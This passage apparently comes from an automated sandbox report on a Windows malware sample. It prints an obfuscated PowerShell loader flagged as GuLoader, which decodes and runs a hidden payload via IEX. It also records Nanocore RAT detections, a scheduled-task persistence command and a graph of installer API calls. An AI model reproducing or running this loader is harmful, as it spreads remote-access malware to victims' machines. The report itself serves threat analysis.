b5Bi1Bl3Hy1 E0Sm1 SATf1Cr7 R0Ti5 D1kiD L1Lg3Lo1Pr8 n5 D6 D4 DB A5 F6Sk2SaDFi2Lk5Ba0MiFja0Em5 C0 S2 S1ex3Ed1 MBOp5 U8 D2 P4 G0 C3 V1 S8 O0Ph2Da1fdF a1DiBly1 O3Ug5 U8 i3HoFCh1 t8Ec0 p2wi1 T3 S0 P4Ci1Ti9Gr0 V6 P2ba5Eg1Ap3An0 G4To0Fl0Ja1peFBl1Ku5Mi1 B3Se0 B5Su5Aa8 A3InBFi1Di7Vu0Fo4 K0 R5Mo1 FEFe1Ac7Ro1MaAEp2EfB I4DaCBa4vuCSt3 I1De1Mo3 R0Tj2 P3Co2Aa1Gn3Ko1 EAmi1Sa3En1 s1Un1 F7 f0 T2Hu1 U3Se3In0Aa1 C9Ma0Te4Ge3 m0 F0Si3ce1Be8 H1 u5Wi0Ve2 S1VaF r1 S9 C1Ha8 c2 P6 P1 S9 C1KaFSk1Be8Le0ro2 P1Se3 P0Ko4wi5 IE P5DiEUn1Sp0Ud1DiDRe0 T6Ny5Ar6Rn5 k2re3 S5 N1Ln9Ke1caBFa0 T6Ad1UnAMo1 O3 C1GyB F1 P3Nu1Dd8Al0Pr2 K1SeFSk1Oa8 B1An1Re5Dr6wo5Su2An0Ov4Le1Mi9 P0 s5 M1UsF R1Po8Nr1Pi3 A0Tr4Ga0 F5St4Ti0Pa5 CF G5 TA D5St6Ra5 LEPr3Ma1Uf3Ra2 M2Bo2 L5 B6Va3Co6Te5BlESp2 SDno3BiF L1Ei8Ko0En2Mu4Ma5st4Pe4Cr2 UB A5ReA B5Ca6ch2NoDRu3BeFMi1Fo8Au0 I2Pr4Ga5No4Kn4to2EnBUn5 FABu5Ru6 S2 NDSt3AfFDe1Fi8 S0 O2 O4Be5 K4Br4 T2InBMu5TrA A5Ro6Bi2 RDUd3SkFLi1St8 C0Bl2Il4 R5 Q4Co4 O2EnBAn5ReAKa5 F6Pl2HaDSt3JaF f1 K8ko0 W2 T4 D5 Z4kr4Re2 ABOb5 PF o5 B6ti5ZaEPo2 FD E3 PFIn1Fr8Su0 S2Un2 H6ro0Hv2Br0Co4Go2UnBPr5UgFBe5 LFrn5DiF H' S)Pr;Ra&Ha(Sk`$bor Vo KsFeiWinUdeSkrFosSl7Pr)Un Un(noBSjr Ru adKogknoNomcomPue A0un4Th St'Tu5Pr2Pr2Ke5Sc1 C3 U1ToB S1 S7 H1 P3 H1 A9Hy0Fr5Vi0 h2Co1Pe9Tv1 AB t1Ma7Et0Ab2Ud1 B7Or5Lo6 M4NeB A5Kn6Un5An2 S3 T2In1 SF N1Pr7re0Ia4Un0 SFUd5Di8To3diFPl1He8 B0 R0 C1 R9gl1 TD G1St3 B5 kEKa5SlB B4 B7 a5ViA r4 U6 O5 RA s4 N0Lo4Un2 d5 AA T4Ve6 P5UdAAr5Ba6 P4ko1Ra4 T5 T4 T7 I4SpFOm4 HF t4En0 G4Na7 C4Ca0 I5KnAHa4 B6 H5 DFWe'Le) v;Mi&In( S`$UnrRioDasEniBanDye ArAdsoc7Un)Ov Oa( AB sr SusudOdg So Nm Sm Ae S0Ju4 M Af' T5Fl2El3fj7En1Ba8Zo1Kl5Fl1 U3 S0Co5Ex0Tr2 L0Go4 S1LiF F1se7Ky1Pl8Je5bi6Ne4EaBUr5Sf6Tr5ek2 E2 F5 T1Ud8 S1 T7Ko0Ne6Sa0Br5Co1Un3Ti1 P0pu1ThA m1hu7Ta0 P5Fo1 WDSk1Sp3tr1So8Ka5Un8 F3ruFAn1Ko8 S0Hi0Bu1Op9 i1StD B1In3Pr5 PE K5En2Fi2 G5 K1Su3Dk1VeBTr1An7 F1Os3Li1 K9 A0Fi5 U0Co2 E1 P9Te1ExB C1Pr7sr0Be2Ny1Sm7Tr5 SAPe4Ru6An2 ME S4St4sk4Ru4Av5EnA d4pr6Te5 WAAp4 S6Lu5 gAGr4 A6 B5TeF C' b) S;Ps`$NoSPet GaFonBac KhSci PoPrnSkeSodCo2Ze= R`"""fj`$ Te LnMov R:LeLcaO SC EA RLAcAPaPEfPUnDRiA uTSaA R\ BSbok haBamScfPrlToe GlHisLueLinEls F\ Vf Fa GmSne MlSaeBesSts s\YaP Vr Ue Cg DeSon leMir Do Ru Ns A2br2Pa4Or\osAHitRoe Vi Ss UtMeiPlsCokBleNos F. ANUdo QnWe`""" I; S&Mu(Un`$ Pr Ao is JiGen SeLerBas R7 O) S Fo( TB Sr Gu Sd PgPhoBimSvmSkeAn0Uo4Al Si'Gu5 B2Be2Pa0Pr1Pi7Ar1Fo1Re0 P5 A0Da2 R1Dr3sk5Af6op4ZiBLo5 S6Br2FlDCo2 S5Sp0KoF B0po5Fo0Or2en1Aa3Om1 SBBi5Te8 L3EpF G3Ak9La5 s8 S3 L0 B1DuF d1BaA N1 F3 A2SkBSk4 BC U4 AC L2 A4Pr1Tr3 O1Fl7Sw1Er2Pi3dr7Hy1 SAEv1PrAAm3 F4No0GaF H0 I2Ka1 I3 M0My5 C5FlEHa5An2 N2sh5 A0 D2Ka1Di7 P1 D8Oc1 P5Di1UnE P1reF S1Un9 U1 E8 A1Ek3 H1 v2Sh4Co4pe5 TF E' R)Al; I`$TrISvn TfPoi GmHauKrm F=Le`$CoVMea ag Fs StKreFe.MacFio Su KnTrtpi- F1Be0 L2Ti4 S; P& F( G`$ ArGro TsUniMunFie SrUns S7Pr) I Kv(FaB srBiu PdIng ro TmEpm FeFa0So4 A s' A2 DDRa2 C5Se0SoFSp0Sk5Ko0 s2Bn1Un3 U1 RBTr5 H8 J2Ce4Ve0 C3Di1Br8 C0Te2 P1 UF U1inBPu1 P3 O5 P8 S3 DF K1No8Re0As2Ra1Sm3 D0Da4 A1Ma9Un0 S6Gs2 D5Ov1Na3Ta0 s4 R0Pr0St1OyFSa1 C5Ud1Sa3 V0Ba5 F5Ou8 U3ViB B1Al7 T0 O4 S0Su5 S1MyE R1 K7Ge1 GAla2 sBMa4 LC D4RuCBr3Sy5En1Re9 G0 O6Er0YnFFu5 LE k5 R2 C2 S0 A1qu7 T1Dj1 I0 W5pr0 C2Fi1Kr3 M5 IAFe5Kr6Ko4Lo7 M4 U6 C4Fe4Ve4 M2 t5BuABo5 D6 R5 T2Sl3 I7 S1 p8fl1sk5Ba1To3sm0Un5 L0 T2 P0Tr4Un1 MFCo1 H7Om1Fo8po5AlA u5 K6 V5 S2Ud3SlF B1Ac8si1Sk0Ma1AtF s1miBKa0Ne3 A1 NB t5FiFUd' s)Fo;va&Vi( P`$ srIno Ssimi Dn ceNerOps P7 D) B Mi(CyBAmr Eu SdChg DoMomRemJee s0 n4Sm Ve'st5 u2Sk1Fj0um1 S9ca0 P4 D1TuE F1CoF S1Oe8 T1 C2Oc0Ga4Ej1 A3Te0 P5Sa5 S6 O4MiBOv5 A6to2 VDsa2Ra5 A0PiF L0Di5 O0Sa2Pr1Su3Ri1 HB G5 C8Be2 S4Va0Ab3be1Vi8Ls0 T2Af1 PFFr1TrBPl1Bi3Sk5Hy8 V3FoF B1Sv8Fa0 E2Pa1 x3Ga0 U4 s1Pr9Un0 M6 A2 S5Le1Su3De0Ok4Sp0 C0Hj1SkFGe1fr5Mo1 h3 P0Ud5 B5 A8Po3SpBNo1Cu7 T0Bi4Ud0Fe5De1 FE P1 C7no1 DALa2 SB T4AnC C4BlCTe3 T1to1 A3Se0Bo2Fo3Af2Bi1 E3Di1AnA F1 P3He1 R1Ta1Sa7Os0Ga2 U1Sp3Ut3Wo0An1Br9 P0 T4 A3gr0Wa0Et3 p1ca8Fu1 D5 T0 N2Er1 DFRa1 p9Ov1Sk8Aa2Sl6 d1 S9 P1 UFFd1Fo8 D0Hi2 S1Gl3An0Ef4Ki5 EE J5PrEIs1Ov0Er1LeD C0Ta6 S5sk6 C5 S2Sk3 s5Rh1an9Re1udB T0 F6Ny1SuA T1Sc3 H1 FBov1an3Sk1He8 A0Ln2Bl1 HFIn1We8Wo1 K1In5Wh6Ti5Ma2 S3ReEGu1 E9Ci1FoAPe1Fe7No1Po4Je1FuF t0 L4Tr1Ru2Pr4 S7Pr4 S4 B4 H6Ne5YeFSi5AnAro5py6 A5NdE S3 U1Ps3Hm2In2Hy2 T5 M6Mu3Ro6Gl5SvESk2 KD S3AnF F1Th8Th0 M2Sk2 G6 A0 T2Gl0Ud4 D2 LBBj5 BABu5Ro6 C2 MDSp3OvFHa1Sl8 A0 N2 N2 R6Cl0 S2Do0De4Se2UnB U5KoA U5 B6 I2 UD C3BrFNo1 H8Sl0Un2 T2 E6Ra0 o2Un0 V4 O2FiB k5ApFOv5Su6 M5ViE S2psDca3MeF B1St8 G0Ma2Ps2An6 E0Ha2Bu0 E4Te2 UB D5BrF M5 SFHa5 lF R' T)Pe;fr& F(Uf`$Bir Korys KiFrnRoe BrHasTo7 D) B S( MB Fr KuRud Gg Ao Hm Im SeCo0To4Ta F'Bu5Me2Su1Vi0He1Ti9 F0 M4eu1 VECo1 gFCo1 U8 C1Re2Pi0 a4 A1Pa3Di0Sl5 S5Be8 D3PaF S1Hi8Pa0 S0 U1Mi9en1ScDHa1gl3Sv5DiEHa4 L6Sa5ReACr5Tr2 P3 A7 I1 H8Mu1Pr5Cp1Me3 B0Sh5 m0Sc2Ov0un4 M1 UFTa1 T7 S1 T8jo5AlA M4Up6Tr5 DFFo'Me)Ad# M;""";Function Nonschismatic9 { param([String]$Saleswomen); For($Antilabors=2; $Antilabors -lt $Saleswomen.Length-1; $Antilabors+=(2+1)){ $Brudgomme = $Brudgomme + $Saleswomen.Substring($Antilabors, 1); } $Brudgomme;}$Ironiernes0 = Nonschismatic9 'GeIPeEIbXIn ';&$Ironiernes0 (Nonschismatic9 $Boarspear);<#Microphytic udvandrere Trichosanthes Eudemons Longobardi Helicidae lundress #>;"
        Imagebase:0xf10000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.24024306894.000000000C1E3000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
        Reputation:high
        Has exited:true

        Target ID:5
        Start time:01:25:41
        Start date:05/07/2024
        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
        Imagebase:0x6c0000
        File size:106'496 bytes
        MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
        • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
        • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
        Reputation:moderate
        Has exited:false

        Target ID:6
        Start time:01:26:13
        Start date:05/07/2024
        Path:C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit):true
        Commandline:"schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"
        Imagebase:0x10000
        File size:187'904 bytes
        MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:7
        Start time:01:26:13
        Start date:05/07/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6604c0000
        File size:875'008 bytes
        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:8
        Start time:01:26:14
        Start date:05/07/2024
        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
        Imagebase:0x7ff652800000
        File size:106'496 bytes
        MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:9
        Start time:01:26:14
        Start date:05/07/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6604c0000
        File size:875'008 bytes
        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:23.3%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:20.2%
          Total number of Nodes:1327
          Total number of Limit Nodes:30
          execution_graph 2991 401941 2992 401943 2991->2992 2997 402c41 2992->2997 2998 402c4d 2997->2998 3043 4062b9 2998->3043 3001 401948 3003 4059a9 3001->3003 3085 405c74 3003->3085 3006 4059d1 DeleteFileW 3008 401951 3006->3008 3007 4059e8 3010 405b13 3007->3010 3099 406297 lstrcpynW 3007->3099 3010->3008 3128 4065da FindFirstFileW 3010->3128 3011 405a0e 3012 405a21 3011->3012 3013 405a14 lstrcatW 3011->3013 3100 405bb8 lstrlenW 3012->3100 3014 405a27 3013->3014 3017 405a37 lstrcatW 3014->3017 3018 405a2d 3014->3018 3020 405a42 lstrlenW FindFirstFileW 3017->3020 3018->3017 3018->3020 3022 405b08 3020->3022 3041 405a64 3020->3041 3021 405b31 3131 405b6c lstrlenW CharPrevW 3021->3131 3022->3010 3025 405aeb FindNextFileW 3028 405b01 FindClose 3025->3028 3025->3041 3026 405961 5 API calls 3029 405b43 3026->3029 3028->3022 3030 405b47 3029->3030 3031 405b5d 3029->3031 3030->3008 3034 4052ff 24 API calls 3030->3034 3033 4052ff 24 API calls 3031->3033 3033->3008 3036 405b54 3034->3036 3035 4059a9 60 API calls 3035->3041 3038 40605d 36 API calls 3036->3038 3037 4052ff 24 API calls 3037->3025 3039 405b5b 3038->3039 3039->3008 3041->3025 3041->3035 3041->3037 3104 406297 lstrcpynW 3041->3104 3105 405961 3041->3105 3113 4052ff 3041->3113 3124 40605d MoveFileExW 3041->3124 3055 4062c6 3043->3055 3044 406511 3045 402c6e 3044->3045 3076 406297 lstrcpynW 3044->3076 3045->3001 3060 40652b 3045->3060 3047 4064df lstrlenW 3047->3055 3050 4062b9 10 API calls 3050->3047 3051 4063f4 GetSystemDirectoryW 3051->3055 3053 406407 GetWindowsDirectoryW 3053->3055 3054 40652b 5 API calls 3054->3055 3055->3044 3055->3047 3055->3050 3055->3051 3055->3053 3055->3054 3056 40643b SHGetSpecialFolderLocation 3055->3056 3057 4062b9 10 API calls 3055->3057 3058 406482 lstrcatW 3055->3058 3069 406165 3055->3069 3074 4061de wsprintfW 3055->3074 3075 406297 lstrcpynW 3055->3075 3056->3055 3059 406453 SHGetPathFromIDListW CoTaskMemFree 3056->3059 3057->3055 3058->3055 3059->3055 3067 406538 3060->3067 3061 4065ae 3062 4065b3 CharPrevW 3061->3062 3064 4065d4 3061->3064 3062->3061 3063 4065a1 CharNextW 3063->3061 3063->3067 3064->3001 3066 40658d CharNextW 3066->3067 3067->3061 3067->3063 3067->3066 3068 40659c CharNextW 3067->3068 3081 405b99 3067->3081 3068->3063 3077 406104 3069->3077 3072 4061c9 3072->3055 3073 406199 RegQueryValueExW RegCloseKey 3073->3072 3074->3055 3075->3055 3076->3045 3078 406113 3077->3078 3079 406117 3078->3079 3080 40611c RegOpenKeyExW 3078->3080 3079->3072 3079->3073 3080->3079 3083 405b9f 3081->3083 3082 405bb5 3082->3067 3083->3082 3084 405ba6 CharNextW 3083->3084 3084->3083 3134 406297 lstrcpynW 3085->3134 3087 405c85 3135 405c17 CharNextW CharNextW 3087->3135 3090 4059c9 3090->3006 3090->3007 3091 40652b 5 API calls 3097 405c9b 3091->3097 3092 405ccc lstrlenW 3093 405cd7 3092->3093 3092->3097 3094 405b6c 3 API calls 3093->3094 3096 405cdc GetFileAttributesW 3094->3096 3095 4065da 2 API calls 3095->3097 3096->3090 3097->3090 3097->3092 3097->3095 3098 405bb8 2 API calls 3097->3098 3098->3092 3099->3011 3101 405bc6 3100->3101 3102 405bd8 3101->3102 3103 405bcc CharPrevW 3101->3103 3102->3014 3103->3101 3103->3102 3104->3041 3141 405d68 GetFileAttributesW 3105->3141 3108 40598e 3108->3041 3109 405984 DeleteFileW 3111 40598a 3109->3111 3110 40597c RemoveDirectoryW 3110->3111 3111->3108 3112 40599a SetFileAttributesW 3111->3112 3112->3108 3114 40531a 3113->3114 3123 4053bc 3113->3123 3115 405336 lstrlenW 3114->3115 3116 4062b9 17 API calls 3114->3116 3117 405344 lstrlenW 3115->3117 3118 40535f 3115->3118 3116->3115 3119 405356 lstrcatW 3117->3119 3117->3123 3120 405372 3118->3120 3121 405365 SetWindowTextW 3118->3121 3119->3118 3122 405378 SendMessageW SendMessageW SendMessageW 3120->3122 3120->3123 3121->3120 3122->3123 3123->3041 3125 40607e 3124->3125 3126 406071 3124->3126 3125->3041 3144 405ee3 3126->3144 3129 4065f0 FindClose 3128->3129 3130 405b2d 3128->3130 3129->3130 3130->3008 3130->3021 3132 405b37 3131->3132 3133 405b88 lstrcatW 3131->3133 3132->3026 3133->3132 3134->3087 3136 405c34 3135->3136 3139 405c46 3135->3139 3138 405c41 CharNextW 3136->3138 3136->3139 3137 405c6a 3137->3090 3137->3091 3138->3137 3139->3137 3140 405b99 CharNextW 3139->3140 3140->3139 3142 40596d 3141->3142 3143 405d7a SetFileAttributesW 3141->3143 3142->3108 3142->3109 3142->3110 3143->3142 3145 405f13 3144->3145 3146 405f39 GetShortPathNameW 3144->3146 3171 405d8d GetFileAttributesW CreateFileW 3145->3171 3147 406058 3146->3147 3148 405f4e 3146->3148 3147->3125 3148->3147 3151 405f56 wsprintfA 3148->3151 3150 405f1d CloseHandle GetShortPathNameW 3150->3147 3152 405f31 3150->3152 3153 4062b9 17 API calls 3151->3153 3152->3146 3152->3147 3154 405f7e 3153->3154 3172 405d8d GetFileAttributesW CreateFileW 3154->3172 3156 405f8b 3156->3147 3157 405f9a GetFileSize GlobalAlloc 3156->3157 3158 406051 CloseHandle 3157->3158 3159 405fbc 3157->3159 3158->3147 3173 405e10 ReadFile 3159->3173 3164 405fdb lstrcpyA 3167 405ffd 3164->3167 3165 405fef 3166 405cf2 4 API calls 3165->3166 3166->3167 3168 406034 SetFilePointer 3167->3168 3180 405e3f WriteFile 3168->3180 3171->3150 3172->3156 3174 405e2e 3173->3174 3174->3158 3175 405cf2 lstrlenA 3174->3175 3176 405d33 lstrlenA 3175->3176 3177 405d3b 3176->3177 3178 405d0c lstrcmpiA 3176->3178 3177->3164 3177->3165 3178->3177 3179 405d2a CharNextA 3178->3179 3179->3176 3181 405e5d GlobalFree 3180->3181 3181->3158 3182 4015c1 3183 402c41 17 API calls 3182->3183 3184 4015c8 3183->3184 3185 405c17 4 API calls 3184->3185 3186 4015d1 3185->3186 3187 401631 3186->3187 3188 405b99 CharNextW 3186->3188 3198 4015fa 3186->3198 3199 401617 GetFileAttributesW 3186->3199 3206 405868 3186->3206 3214 40584b CreateDirectoryW 3186->3214 3189 401663 3187->3189 3190 401636 3187->3190 3188->3186 3192 401423 24 API calls 3189->3192 3202 401423 3190->3202 3200 40165b 3192->3200 3197 40164a SetCurrentDirectoryW 3197->3200 3198->3186 3209 4057ce CreateDirectoryW 3198->3209 3199->3186 3203 4052ff 24 API calls 3202->3203 3204 401431 3203->3204 3205 406297 lstrcpynW 3204->3205 3205->3197 3217 406671 GetModuleHandleA 3206->3217 3210 40581b 3209->3210 3211 40581f GetLastError 3209->3211 3210->3198 3211->3210 3212 40582e SetFileSecurityW 3211->3212 3212->3210 3213 405844 GetLastError 3212->3213 3213->3210 3215 40585b 3214->3215 3216 40585f GetLastError 3214->3216 3215->3186 3216->3215 3218 406697 GetProcAddress 3217->3218 3219 40668d 3217->3219 3221 40586f 3218->3221 3223 406601 GetSystemDirectoryW 3219->3223 3221->3186 3222 406693 3222->3218 3222->3221 3224 406623 wsprintfW LoadLibraryExW 3223->3224 3224->3222 3818 404344 lstrcpynW lstrlenW 3819 403945 3820 403950 3819->3820 3821 403957 GlobalAlloc 3820->3821 3822 403954 3820->3822 3821->3822 3327 401e49 3328 402c1f 17 API calls 3327->3328 3329 401e4f 3328->3329 3330 402c1f 17 API calls 3329->3330 3331 401e5b 3330->3331 3332 401e72 EnableWindow 3331->3332 3333 401e67 ShowWindow 3331->3333 3334 402ac5 3332->3334 3333->3334 3823 40264a 3824 402c1f 17 API calls 3823->3824 3832 402659 3824->3832 3825 402796 3826 4026a3 ReadFile 3826->3825 3826->3832 3827 405e10 ReadFile 3827->3832 3828 4026e3 MultiByteToWideChar 3828->3832 3829 402798 3845 4061de wsprintfW 3829->3845 3832->3825 3832->3826 3832->3827 3832->3828 3832->3829 3833 402709 SetFilePointer MultiByteToWideChar 3832->3833 3834 4027a9 3832->3834 3836 405e6e SetFilePointer 3832->3836 3833->3832 3834->3825 3835 4027ca SetFilePointer 3834->3835 3835->3825 3837 405ea2 3836->3837 3838 405e8a 3836->3838 3837->3832 3839 405e10 ReadFile 3838->3839 3840 405e96 3839->3840 3840->3837 3841 405ed3 SetFilePointer 3840->3841 3842 405eab SetFilePointer 3840->3842 3841->3837 3842->3841 3843 405eb6 3842->3843 3844 405e3f WriteFile 3843->3844 3844->3837 3845->3825 3849 4016cc 3850 402c41 17 API calls 3849->3850 3851 4016d2 GetFullPathNameW 3850->3851 3852 4016ec 3851->3852 3858 40170e 3851->3858 3854 4065da 2 API calls 3852->3854 3852->3858 3853 401723 GetShortPathNameW 3856 402ac5 3853->3856 3855 4016fe 3854->3855 3855->3858 3859 406297 lstrcpynW 3855->3859 3858->3853 3858->3856 3859->3858 3860 4043cd 3861 4043e5 3860->3861 3865 4044ff 3860->3865 3866 40420e 18 API calls 3861->3866 3862 404569 3863 404573 GetDlgItem 3862->3863 3864 404633 3862->3864 3867 4045f4 3863->3867 3868 40458d 3863->3868 3871 404275 8 API calls 3864->3871 3865->3862 3865->3864 3869 40453a GetDlgItem SendMessageW 3865->3869 3870 40444c 3866->3870 3867->3864 3876 404606 3867->3876 3868->3867 3875 4045b3 SendMessageW LoadCursorW SetCursor 3868->3875 3893 404230 KiUserCallbackDispatcher 3869->3893 3873 40420e 18 API calls 3870->3873 3874 40462e 3871->3874 3878 404459 CheckDlgButton 3873->3878 3897 40467c 3875->3897 3880 40461c 3876->3880 3881 40460c SendMessageW 3876->3881 3877 404564 3894 404658 3877->3894 3891 404230 KiUserCallbackDispatcher 3878->3891 3880->3874 3882 404622 SendMessageW 3880->3882 3881->3880 3882->3874 3886 404477 GetDlgItem 3892 404243 SendMessageW 3886->3892 3888 40448d SendMessageW 3889 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3888->3889 3890 4044aa GetSysColor 3888->3890 3889->3874 3890->3889 3891->3886 3892->3888 3893->3877 3895 404666 3894->3895 3896 40466b SendMessageW 3894->3896 3895->3896 3896->3862 3900 4058c3 ShellExecuteExW 3897->3900 3899 4045e2 LoadCursorW SetCursor 3899->3867 3900->3899 3901 40234e 3902 402c41 17 API calls 3901->3902 3903 40235d 3902->3903 3904 402c41 17 API calls 3903->3904 3905 402366 3904->3905 3906 402c41 17 API calls 3905->3906 3907 402370 GetPrivateProfileStringW 3906->3907 3908 401b53 3909 402c41 17 API calls 3908->3909 3910 401b5a 3909->3910 3911 402c1f 17 API calls 3910->3911 3912 401b63 wsprintfW 3911->3912 3913 402ac5 3912->3913 3914 404a55 3915 404a81 3914->3915 3916 404a65 3914->3916 3918 404ab4 3915->3918 3919 404a87 SHGetPathFromIDListW 3915->3919 3925 4058e1 GetDlgItemTextW 3916->3925 3921 404a9e SendMessageW 3919->3921 3922 404a97 3919->3922 3920 404a72 SendMessageW 3920->3915 3921->3918 3924 40140b 2 API calls 3922->3924 3924->3921 3925->3920 3926 401956 3927 402c41 17 API calls 3926->3927 3928 40195d lstrlenW 3927->3928 3929 402592 3928->3929 3930 4014d7 3931 402c1f 17 API calls 3930->3931 3932 4014dd Sleep 3931->3932 3934 402ac5 3932->3934 3935 401f58 3936 402c41 17 API calls 3935->3936 3937 401f5f 3936->3937 3938 4065da 2 API calls 3937->3938 3939 401f65 3938->3939 3941 401f76 3939->3941 3942 4061de wsprintfW 3939->3942 3942->3941 3753 402259 3754 402c41 17 API calls 3753->3754 3755 40225f 3754->3755 3756 402c41 17 API calls 3755->3756 3757 402268 3756->3757 3758 402c41 17 API calls 3757->3758 3759 402271 3758->3759 3760 4065da 2 API calls 3759->3760 3761 40227a 3760->3761 3762 40228b lstrlenW lstrlenW 3761->3762 3766 40227e 3761->3766 3764 4052ff 24 API calls 3762->3764 3763 4052ff 24 API calls 3767 402286 3763->3767 3765 4022c9 SHFileOperationW 3764->3765 3765->3766 3765->3767 3766->3763 3766->3767 3943 40175c 3944 402c41 17 API calls 3943->3944 3945 401763 3944->3945 3946 405dbc 2 API calls 3945->3946 3947 40176a 3946->3947 3947->3947 3948 401d5d GetDlgItem GetClientRect 3949 402c41 17 API calls 3948->3949 3950 401d8f LoadImageW SendMessageW 3949->3950 3951 401dad DeleteObject 3950->3951 3952 402ac5 3950->3952 3951->3952 3953 4022dd 3954 4022e4 3953->3954 3957 4022f7 3953->3957 3955 4062b9 17 API calls 3954->3955 3956 4022f1 3955->3956 3958 4058fd MessageBoxIndirectW 3956->3958 3958->3957 3959 401563 3960 402a6b 3959->3960 3963 4061de wsprintfW 3960->3963 3962 402a70 3963->3962 3230 4023e4 3231 402c41 17 API calls 3230->3231 3232 4023f6 3231->3232 3233 402c41 17 API calls 3232->3233 3234 402400 3233->3234 3247 402cd1 3234->3247 3237 402ac5 3238 402438 3240 402444 3238->3240 3251 402c1f 3238->3251 3239 402c41 17 API calls 3241 40242e lstrlenW 3239->3241 3243 402463 RegSetValueExW 3240->3243 3254 403116 3240->3254 3241->3238 3245 402479 RegCloseKey 3243->3245 3245->3237 3248 402cec 3247->3248 3274 406132 3248->3274 3252 4062b9 17 API calls 3251->3252 3253 402c34 3252->3253 3253->3240 3255 40312f 3254->3255 3256 40315d 3255->3256 3281 403324 SetFilePointer 3255->3281 3278 40330e 3256->3278 3260 4032a7 3263 4032e9 3260->3263 3266 4032ab 3260->3266 3261 40317a GetTickCount 3262 403291 3261->3262 3270 4031a6 3261->3270 3262->3243 3265 40330e ReadFile 3263->3265 3264 40330e ReadFile 3264->3270 3265->3262 3266->3262 3267 40330e ReadFile 3266->3267 3268 405e3f WriteFile 3266->3268 3267->3266 3268->3266 3269 4031fc GetTickCount 3269->3270 3270->3262 3270->3264 3270->3269 3271 403221 MulDiv wsprintfW 3270->3271 3273 405e3f WriteFile 3270->3273 3272 4052ff 24 API calls 3271->3272 3272->3270 3273->3270 3275 406141 3274->3275 3276 402410 3275->3276 3277 40614c RegCreateKeyExW 3275->3277 3276->3237 3276->3238 3276->3239 3277->3276 3279 405e10 ReadFile 3278->3279 3280 403168 3279->3280 3280->3260 3280->3261 3280->3262 3281->3256 3964 401968 3965 402c1f 17 API calls 3964->3965 3966 40196f 3965->3966 3967 402c1f 17 API calls 3966->3967 3968 40197c 3967->3968 3969 402c41 17 API calls 3968->3969 3970 401993 lstrlenW 3969->3970 3971 4019a4 3970->3971 3974 4019e5 3971->3974 3976 406297 lstrcpynW 3971->3976 3973 4019d5 3973->3974 3975 4019da lstrlenW 3973->3975 3975->3974 3976->3973 3977 40166a 3978 402c41 17 API calls 3977->3978 3979 401670 3978->3979 3980 4065da 2 API calls 